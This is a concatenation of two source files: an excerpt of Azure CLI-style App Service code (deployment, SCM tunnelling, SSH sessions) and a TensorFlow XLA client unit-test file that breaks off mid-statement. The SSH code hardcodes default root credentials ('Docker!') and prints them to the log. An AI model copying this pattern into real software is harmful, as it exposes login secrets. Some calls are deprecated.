" "Please create a new app to continue this operation.".format(name, current_os, src_dir, os)) _is_linux = plan_info.reserved # for an existing app check if the runtime version needs to be updated # Get site config to check the runtime version site_config = client.web_apps.get_configuration(rg_name, name) else: # need to create new app, check if we need to use default RG or use user entered values logger.warning("webapp %s doesn't exist", name) sku = get_sku_to_use(src_dir, html, sku) loc = set_location(cmd, sku, location) rg_name = get_rg_to_use(cmd, user, loc, os_name, resource_group_name) _is_linux = os_name.lower() == 'linux' _create_new_rg = should_create_new_rg(cmd, rg_name, _is_linux) plan = get_plan_to_use(cmd, user, os_name, loc, sku, rg_name, _create_new_rg, plan) dry_run_str = r""" { "name" : "%s", "appserviceplan" : "%s", "resourcegroup" : "%s", "sku": "%s", "os": "%s", "location" : "%s", "src_path" : "%s", "runtime_version_detected": "%s", "runtime_version": "%s" } """ % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version, runtime_version) create_json = json.loads(dry_run_str) if dryrun: logger.warning("Web app will be created with the below configuration,re-run command " "without the --dryrun flag to create & deploy a new app") return create_json if _create_new_rg: logger.warning("Creating Resource group '%s' ...", rg_name) create_resource_group(cmd, rg_name, location) logger.warning("Resource group creation complete") # create ASP logger.warning("Creating AppServicePlan '%s' ...", plan) # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are # updated we update those create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku, number_of_workers=1 if _is_linux else None, location=location) if _create_new_app: logger.warning("Creating webapp '%s' ...", name) create_webapp(cmd, rg_name, name, plan, runtime_version 
if _is_linux else None, tags={"cli": 'webapp_up'}, using_webapp_up=True, language=language)
        _configure_default_logging(cmd, rg_name, name)
    else:  # for existing app if we might need to update the stack runtime settings
        if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
            logger.warning('Updating runtime version from %s to %s',
                           site_config.linux_fx_version, runtime_version)
            update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
        elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
            logger.warning('Updating runtime version from %s to %s',
                           site_config.windows_fx_version, runtime_version)
            update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
        create_json['runtime_version'] = runtime_version
    # Zip contents & Deploy
    logger.warning("Creating zip with contents of dir %s ...", src_dir)
    # zip contents & deploy
    zip_file_path = zip_contents_from_dir(src_dir, language)
    enable_zip_deploy(cmd, rg_name, name, zip_file_path)
    # Remove the file after deployment, handling exception if user removed the file manually
    try:
        os.remove(zip_file_path)
    except OSError:
        pass
    if launch_browser:
        logger.warning("Launching app using default browser")
        view_in_browser(cmd, rg_name, name, None, logs)
    else:
        _url = _get_url(cmd, rg_name, name)
        logger.warning("You can launch the app at %s", _url)
        create_json.update({'URL': _url})
    if logs:
        _configure_default_logging(cmd, rg_name, name)
        return get_streaming_log(cmd, rg_name, name)
    # Persist the chosen defaults so subsequent CLI invocations reuse them.
    with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
        cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
        cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
        cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
        cmd.cli_ctx.config.set_value('defaults', 'location', loc)
        cmd.cli_ctx.config.set_value('defaults', 'web', name)
    return create_json


def _ping_scm_site(cmd, resource_group, name):
    """Wake the app's Kudu (SCM) site by issuing an authenticated GET to its settings API."""
    from azure.cli.core.util import should_disable_connection_verify
    # wake up kudu, by making an SCM call
    import requests
    # work around until the timeout limits issue for linux is investigated & fixed
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
    scm_url = _get_scm_url(cmd, resource_group, name)
    import urllib3
    # Basic-auth header built from the site-level publishing credentials.
    authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
    requests.get(scm_url + '/api/settings', headers=authorization,
                 verify=not should_disable_connection_verify())


def is_webapp_up(tunnel_server):
    """Return True when the tunnel's remote webapp endpoint reports itself up."""
    return tunnel_server.is_webapp_up()


def get_tunnel(cmd, resource_group_name, name, port=None, slot=None):
    """Build (but do not start) a TunnelServer to the app's SCM site.

    Raises CLIError for Windows plans; waits until the webapp answers before
    returning the ready-to-start tunnel server.
    """
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = webapp.reserved  # 'reserved' flag marks a Linux plan
    if not is_linux:
        raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    # Take credentials from the first publish profile.
    profile_user_name = next(p['userName'] for p in profiles)
    profile_user_password = next(p['userPWD'] for p in profiles)
    if port is None:
        port = 0  # Will auto-select a free port from 1024-65535
        logger.info('No port defined, creating on random free port')
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password)
    _ping_scm_site(cmd, resource_group_name, name)
    _wait_for_webapp(tunnel_server)
    return tunnel_server


def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
    """Open a local tunnel to the app on a background daemon thread and block until timeout/Ctrl+C."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
    t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    t.daemon = True
    t.start()
    logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
    else:
        # Default SSH credentials baked into the App Service Linux container image.
        ssh_user_name = 'root'
        ssh_user_password = 'Docker!'
        logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
    logger.warning('Ctrl + C to close')
    if timeout:
        time.sleep(int(timeout))
    else:
        # NOTE(review): Thread.isAlive() was removed in Python 3.9 — should be is_alive().
        while t.isAlive():
            time.sleep(5)


def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
    """Open a tunnel and attach an interactive SSH session over it, both on daemon threads."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
    t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    t.daemon = True
    t.start()
    # Default SSH credentials of the App Service Linux container.
    ssh_user_name = 'root'
    ssh_user_password = 'Docker!'
    s = threading.Thread(target=_start_ssh_session,
                         args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
    s.daemon = True
    s.start()
    if timeout:
        time.sleep(int(timeout))
    else:
        # NOTE(review): Thread.isAlive() was removed in Python 3.9 — should be is_alive().
        while s.isAlive() and t.isAlive():
            time.sleep(5)


def _wait_for_webapp(tunnel_server):
    """Poll once per second (max ~60 tries) until the webapp responds; raise CLIError on timeout."""
    tries = 0
    while True:
        if is_webapp_up(tunnel_server):
            break
        if tries == 0:
            logger.warning('Connection is not ready yet, please wait')
        if tries == 60:
            raise CLIError("Timeout Error, Unable to establish a connection")
        tries = tries + 1
        logger.warning('.')
        time.sleep(1)


def _start_tunnel(tunnel_server):
    """Thread target: run the tunnel server (blocks until the tunnel closes)."""
    tunnel_server.start_server()


def _start_ssh_session(hostname, port, username, password):
    """Thread target: retry an SSH connection (max ~60 tries), then run an interactive login shell."""
    tries = 0
    while True:
        try:
            c = Connection(host=hostname,
                           port=port,
                           user=username,
                           # connect_timeout=60*10,
                           connect_kwargs={"password": password})
            break
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            if tries == 0:
                logger.warning('Connection is not ready yet, please wait')
            if tries == 60:
                raise CLIError("Timeout Error, Unable to establish a connection")
            tries = tries + 1
            logger.warning('.')
            time.sleep(1)
    try:
        c.run('cat /etc/motd', pty=True)
        # Replace the remote shell with a login shell so the user gets an interactive session.
        c.run('source /etc/profile; exec $SHELL -l', pty=True)
    except Exception as ex:  # pylint: disable=broad-except
        logger.info(ex)
    finally:
        c.close()


def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None):  # pylint: disable=too-many-statements
    """CLI entry point: SSH into a Linux webapp (not supported on Windows clients or with remote debugging on)."""
    import platform
    if platform.system() == "Windows":
        raise CLIError('webapp ssh is only supported on linux and mac')
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        raise CLIError('remote debugging is enabled, please disable')
    create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout)


def create_devops_pipeline(
        cmd,
        functionapp_name=None,
        organization_name=None,
        project_name=None,
        repository_name=None,
        overwrite_yaml=None,
        allow_force_push=None,
        github_pat=None,
        github_repository=None
):
    """Delegate to the interactive Azure DevOps build flow for a function app."""
    from .azure_devops_build_interactive import AzureDevopsBuildInteractive
    azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
                                                                organization_name, project_name,
                                                                repository_name, overwrite_yaml,
                                                                allow_force_push, github_pat,
                                                                github_repository)
    return azure_devops_build_interactive.interactive_azure_devops_build()


def _configure_default_logging(cmd, rg_name, name):
    """Enable application/web-server/container logging for the app (idempotent from caller's view)."""
    logger.warning("Configuring default logging for the app, if not already enabled")
    return config_diagnostics(cmd, rg_name, name,
                              application_logging=True, web_server_logging='filesystem',
                              docker_container_logging='true')


def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
    """Return `ase` unchanged if it is already a resource ID, else build the full ASE resource ID."""
    ase_is_id = is_valid_resource_id(ase)
    if ase_is_id:
        return ase
    from msrestazure.tools import resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(
        subscription=get_subscription_id(cli_ctx),
        resource_group=resource_group_name,
        namespace='Microsoft.Web',
        type='hostingEnvironments',
        name=ase)


def _validate_asp_sku(app_service_environment, sku):
    """Validate that Isolated SKUs are used if-and-only-if an App Service Environment is given."""
    # Isolated SKU is supported only for ASE
    if sku in ['I1', 'I2', 'I3']:
        if not app_service_environment:
            raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
                           "learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
    else:
        if app_service_environment:
            raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
                           "learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")


def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
    """Return `key_vault` unchanged if already a resource ID, else build the full Key Vault resource ID."""
    key_vault_is_id = is_valid_resource_id(key_vault)
    if key_vault_is_id:
        return key_vault
    from msrestazure.tools import resource_id
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(
        subscription=get_subscription_id(cli_ctx),
        resource_group=resource_group_name,
        namespace='Microsoft.KeyVault',
        type='vaults',
        name=key_vault)


def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
    """Return True if `hostname` has a binding on the app whose host_name_type is 'Verified'."""
    hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                'list_host_name_bindings', slot)
    verified_hostname_found = False
    for hostname_binding in hostname_bindings:
        # Binding names come back as 'site/hostname'; compare only the hostname part.
        binding_name = hostname_binding.name.split('/')[-1]
        if binding_name.lower() == hostname and hostname_binding.host_name_type == 'Verified':
            verified_hostname_found = True
    return verified_hostname_found
# ===== xla_client_test.py =====
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import itertools
import threading

import numpy as np

from tensorflow.compiler.xla.python import xla_client
import unittest


class LocalComputationTest(unittest.TestCase):
  """Base class for running an XLA Computation through the local client."""

  def _NewComputation(self, name=None):
    # Default the builder name to the test-case id for easier debugging.
    if name is None:
      name = self.id()
    return xla_client.ComputationBuilder(name)

  def _Execute(self, c, arguments):
    # Compile with example arguments, then execute with the same arguments.
    compiled_c = c.Build().CompileWithExampleArguments(arguments)
    return compiled_c.Execute(arguments)

  def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
    assert expected is not None
    result = self._Execute(c, arguments)
    # Numpy's comparison methods are a bit too lenient by treating inputs as
    # "array-like", meaning that scalar 4 will be happily compared equal to
    # [[4]]. We'd like to be more strict so assert shapes as well.
    self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
    assert_func(result, expected)

  def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
    # Exact (bitwise/elementwise-equal) comparison.
    self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)

  def _ExecuteAndCompareClose(self, c, arguments=(), expected=None):
    # Tolerance-based comparison for floating-point results.
    self._ExecuteAndAssertWith(np.testing.assert_allclose, c, arguments,
                               expected)


def NumpyArrayF32(*args, **kwargs):
  """Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
  return np.array(*args, dtype=np.float32, **kwargs)


def NumpyArrayF64(*args, **kwargs):
  """Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
  return np.array(*args, dtype=np.float64, **kwargs)


def NumpyArrayS32(*args, **kwargs):
  """Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
  return np.array(*args, dtype=np.int32, **kwargs)


def NumpyArrayS64(*args, **kwargs):
  """Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
  return np.array(*args, dtype=np.int64, **kwargs)


def NumpyArrayBool(*args, **kwargs):
  """Convenience wrapper to create Numpy arrays with a np.bool dtype."""
  # NOTE(review): the np.bool alias is deprecated (removed in NumPy 1.24) —
  # modern NumPy requires the builtin `bool` or np.bool_ here.
  return np.array(*args, dtype=np.bool, **kwargs)


class ComputationsWithConstantsTest(LocalComputationTest):
  """Tests focusing on Constant ops."""

  def testConstantScalarSumF32(self):
    c = self._NewComputation()
    c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
    self._ExecuteAndCompareClose(c, expected=4.25)

  def testConstantScalarSumF64(self):
    c = self._NewComputation()
    c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
    self._ExecuteAndCompareClose(c, expected=4.25)

  def testConstantScalarSumS32(self):
    c = self._NewComputation()
    c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
    self._ExecuteAndCompareClose(c, expected=3)

  def testConstantScalarSumS64(self):
    c = self._NewComputation()
    c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
    self._ExecuteAndCompareClose(c, expected=3)

  def testConstantVectorMulF32(self):
    c = self._NewComputation()
    c.Mul(
        c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
        c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
    self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])

  def testConstantVectorMulF64(self):
    c = self._NewComputation()
    c.Mul(
        c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
        c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
    self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])

  def testConstantVectorScalarDivF32(self):
    c = self._NewComputation()
    c.Div(
        c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
        c.ConstantF32Scalar(2.0))
    self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])

  def testConstantVectorScalarDivF64(self):
    c = self._NewComputation()
    c.Div(
        c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
        c.ConstantF64Scalar(2.0))
    self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])

  def testConstantVectorScalarPowF32(self):
    c = self._NewComputation()
    c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
    self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])

  def testConstantVectorScalarPowF64(self):
    c = self._NewComputation()
    c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
    self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])

  def testBooleanAnd(self):
    c = self._NewComputation()
    c.And(
        c.Constant(NumpyArrayBool([True, False, True, False])),
        c.Constant(NumpyArrayBool([True, True, False, False])))
    self._ExecuteAndCompareExact(c, expected=[True, False, False, False])

  def testBooleanOr(self):
    c = self._NewComputation()
    c.Or(
        c.Constant(NumpyArrayBool([True, False, True, False])),
        c.Constant(NumpyArrayBool([True, True, False, False])))
    self._ExecuteAndCompareExact(c, expected=[True, True, True, False])

  def testSum2DF32(self):
    c = self._NewComputation()
    c.Add(
        c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
        c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
    self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])

  def testSum2DF64(self):
    c = self._NewComputation()
    c.Add(
        c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
        c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
    self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])

  def testSum2DWith1DBroadcastDim0F32(self):
    # sum of a 2D array with a 1D array where the latter is replicated across
    # dimension 0 to match the former's shape.
    c = self._NewComputation()
    c.Add(
        c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        c.Constant(NumpyArrayF32([10, 20, 30])),
        broadcast_dimensions=(0,))
    self._ExecuteAndCompareClose(
        c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])

  def testSum2DWith1DBroadcastDim0F64(self):
    # sum of a 2D array with a 1D array where the latter is replicated across
    # dimension 0 to match the former's shape.
    c = self._NewComputation()
    c.Add(
        c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        c.Constant(NumpyArrayF64([10, 20, 30])),
        broadcast_dimensions=(0,))
    self._ExecuteAndCompareClose(
        c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])

  def testSum2DWith1DBroadcastDim1F32(self):
    # sum of a 2D array with a 1D array where the latter is replicated across
    # dimension 1 to match the former's shape.
    c = self._NewComputation()
    c.Add(
        c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        c.Constant(NumpyArrayF32([10, 20, 30])),
        broadcast_dimensions=(1,))
    self._ExecuteAndCompareClose(
        c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])

  def testSum2DWith1DBroadcastDim1F64(self):
    # sum of a 2D array with a 1D array where the latter is replicated across
    # dimension 1 to match the former's shape.
    c = self._NewComputation()
    c.Add(
        c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
        c.Constant(NumpyArrayF64([10, 20, 30])),
        broadcast_dimensions=(1,))
    self._ExecuteAndCompareClose(
        c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])

  def testConstantAxpyF32(self):
    c = self._NewComputation()
    c.Add(
        c.Mul(
            c.ConstantF32Scalar(2),
            c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
        c.Constant(NumpyArrayF32([100, -100, 200, -200])))
    self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])

  def testConstantAxpyF64(self):
    c = self._NewComputation()
    c.Add(
        c.Mul(
            c.ConstantF64Scalar(2),
            c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
        c.Constant(NumpyArrayF64([100, -100, 200, -200])))
    self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])


class ParametersTest(LocalComputationTest):
  """Tests focusing on Parameter ops and argument-passing."""

  def setUp(self):
    # Fixed scalar/vector fixtures reused across parameter tests.
    self.f32_scalar_2 = NumpyArrayF32(2.0)
    self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
    self.f64_scalar_2 = NumpyArrayF64(2.0)
    self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
    self.s32_scalar_3 = NumpyArrayS32(3)
    self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
    self.s64_scalar_3 = NumpyArrayS64(3)
    self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])

  def testScalarTimesVectorAutonumberF32(self):
    c = self._NewComputation()
    p0 = c.ParameterFromNumpy(self.f32_scalar_2)
    p1 = c.ParameterFromNumpy(self.f32_4vector)
    c.Mul(p0, p1)
    self._ExecuteAndCompareClose(
        c,
        arguments=[self.f32_scalar_2, self.f32_4vector],
        expected=[-4.6, 6.6, -8.6, 10.6])

  def testScalarTimesVectorAutonumberF64(self):
    c = self._NewComputation()
    p0 = c.ParameterFromNumpy(self.f64_scalar_2)
    p1 = c.ParameterFromNumpy(self.f64_4vector)
    c.Mul(p0, p1)
    self._ExecuteAndCompareClose(
        c,
        arguments=[self.f64_scalar_2, self.f64_4vector],
        expected=[-4.6, 6.6, -8.6, 10.6])

  def testScalarTimesVectorS32(self):
    c = self._NewComputation()
    p0 = c.ParameterFromNumpy(self.s32_scalar_3)
    p1 = c.ParameterFromNumpy(self.s32_4vector)
    c.Mul(p0, p1)
    self._ExecuteAndCompareExact(
        c,
        arguments=[self.s32_scalar_3, self.s32_4vector],
        expected=[30, 45, -6, 21])

  def testScalarTimesVectorS64(self):
    c = self._NewComputation()
    p0 = c.ParameterFromNumpy(self.s64_scalar_3)
    p1 = c.ParameterFromNumpy(self.s64_4vector)
    c.Mul(p0, p1)
    self._ExecuteAndCompareExact(
        c,
        arguments=[self.s64_scalar_3, self.s64_4vector],
        expected=[30, 45, -6, 21])

  def testScalarMinusVectorExplicitNumberingF32(self):
    # Use explicit numbering and pass parameter_num first. Sub is used since
    # it's not commutative and can help catch parameter reversal within the
    # computation.
    c = self._NewComputation()
    p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
    p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
    c.Sub(p1, p0)
    self._ExecuteAndCompareClose(
        c,
        arguments=[self.f32_scalar_2, self.f32_4vector],
        expected=[-4.3, 1.3, -6.3, 3.3])

  def testScalarMinusVectorExplicitNumberingF64(self):
    # Use explicit numbering and pass parameter_num first. Sub is used since
    # it's not commutative and can help catch parameter reversal within the
    # computation.
    c = self._NewComputation()
    p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
    p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
    c.Sub(p1, p0)
    self._ExecuteAndCompareClose(
        c,
        arguments=[self.f64_scalar_2, self.f64_4vector],
        expected=[-4.3, 1.3, -6.3, 3.3])


class LocalBufferTest(LocalComputationTest):
  """Tests focusing on execution with LocalBuffers."""

  def _Execute(self, c, arguments):
    # Override: transfer arguments to device as LocalBuffers before executing.
    compiled_c = c.Build().CompileWithExampleArguments(arguments)
    arg_buffers = [xla_client.LocalBuffer.from_py(arg) for arg in arguments]
    result_buffer = compiled_c.ExecuteWithLocalBuffers(arg_buffers)
    return result_buffer.to_py()

  def testConstantSum(self):
    c = self._NewComputation()
    c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
    self._ExecuteAndCompareClose(c, expected=4.25)

  def testOneParameterSum(self):
    c = self._NewComputation()
    c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
    self._ExecuteAndCompareClose(
        c, arguments=[NumpyArrayF32(1.11)], expected=4.25)

  def testTwoParameterSum(self):
    c = self._NewComputation()
    c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
          c.ParameterFromNumpy(NumpyArrayF32(0.)))
    self._ExecuteAndCompareClose(
        c, arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)], expected=4.25)

  def testCannotCallWithDeletedBuffers(self):
    # Executing with an explicitly deleted device buffer must raise.
    c = self._NewComputation()
    c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
    arg = NumpyArrayF32(1.11)
    compiled_c = c.Build().CompileWithExampleArguments([arg])
    arg_buffer = xla_client.LocalBuffer.from_py(arg)
    arg_buffer.delete()
    with self.assertRaises(ValueError):
      compiled_c.ExecuteWithLocalBuffers([arg_buffer])


class SingleOpTest(LocalComputationTest):
  """Tests for single ops.

  The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As minimal as possible number of additional ops are added
  around the op being tested.
  """

  def testConcatenateF32(self):
    c = self._NewComputation()
    c.Concatenate(
        (c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
         c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
        dimension=0)
    self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])

  def testConcatenateF64(self):
    c = self._NewComputation()
    c.Concatenate(
        (c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
         c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
        dimension=0)
    self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])

  def testConvertElementType(self):
    # Exercise ConvertElementType across all (src, dst) dtype pairs.
    # NOTE(review): np.bool here is the deprecated alias (removed in
    # NumPy 1.24).
    xla_types = {
        np.bool: xla_client.xla_data_pb2.PRED,
        np.int32: xla_client.xla_data_pb2.S32,
        np.int64: xla_client.xla_data_pb2.S64,
        np.float32: xla_client.xla_data_pb2.F32,
        np.float64: xla_client.xla_data_pb2.F64,
    }

    def _ConvertAndTest(template, src_dtype, dst_dtype):
      c = self._NewComputation()
      x = c.Constant(np.array(template, dtype=src_dtype))
      c.ConvertElementType(x, xla_types[dst_dtype])
      result = c.Build().Compile().Execute()
      expected = np.array(template, dtype=dst_dtype)
      self.assertEqual(result.shape, expected.shape)
      self.assertEqual(result.dtype, expected.dtype)
      np.testing.assert_equal(result, expected)

    x = [0, 1, 0, 0, 1]
    for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
      _ConvertAndTest(x, src_dtype, dst_dtype)

  def testCrossReplicaSumOneReplica(self):
    # With a single replica, CrossReplicaSum is the identity.
    samples = [
        NumpyArrayF32(42.0),
        NumpyArrayF32([97.0]),
        NumpyArrayF32([64.0, 117.0]),
        NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
    ]
    for lhs in samples:
      c = self._NewComputation()
      c.CrossReplicaSum(c.Constant(lhs))
      self._ExecuteAndCompareExact(c, expected=lhs)

  def testDotMatrixVectorF32(self):
    c = self._NewComputation()
    lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
    rhs = NumpyArrayF32([[10.0], [20.0]])
    c.Dot(c.Constant(lhs), c.Constant(rhs))
    self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))

  def testDotMatrixVectorF64(self):
    c = self._NewComputation()
    lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
    rhs = NumpyArrayF64([[10.0], [20.0]])
    c.Dot(c.Constant(lhs), c.Constant(rhs))
    self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))

  def testDotMatrixMatrixF32(self):
    c = self._NewComputation()
    lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
    rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
    c.Dot(c.Constant(lhs), c.Constant(rhs))
    self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))

  def testDotMatrixMatrixF64(self):
    c = self._NewComputation()
    lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
    rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
    c.Dot(c.Constant(lhs), c.Constant(rhs))
    self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))

  def testDotGeneral(self):
    # Batched matmul expressed via DotGeneral dimension-number tuples:
    # contracting dims (lhs 2, rhs 1), batch dims (lhs 0, rhs 0).
    c = self._NewComputation()
    rng = np.random.RandomState(0)
    lhs = NumpyArrayF32(rng.randn(10, 3, 4))
    rhs = NumpyArrayF32(rng.randn(10, 4, 5))
    dimension_numbers = (([2], [1]), ([0], [0]))
    c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
    self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))

  def testDotGeneralWithDotDimensionNumbersProto(self):
    # Same batched matmul, but dimension numbers given as a proto message.
    c = self._NewComputation()
    rng = np.random.RandomState(0)
    lhs = NumpyArrayF32(rng.randn(10, 3, 4))
    rhs = NumpyArrayF32(rng.randn(10, 4, 5))
    dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
    dimension_numbers.lhs_contracting_dimensions.append(2)
    dimension_numbers.rhs_contracting_dimensions.append(1)
    dimension_numbers.lhs_batch_dimensions.append(0)
    dimension_numbers.rhs_batch_dimensions.append(0)
    c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
    self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))

  def testConvF32Same(self):
    c = self._NewComputation()
    a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
    lhs = a(1, 2, 3, 4)
    rhs = a(1, 2, 1, 2) * 10
    c.Conv(c.Constant(lhs), c.Constant(rhs), [1, 1],
           xla_client.PaddingType.SAME)
    result = np.array([[[[640., 700., 760., 300.],
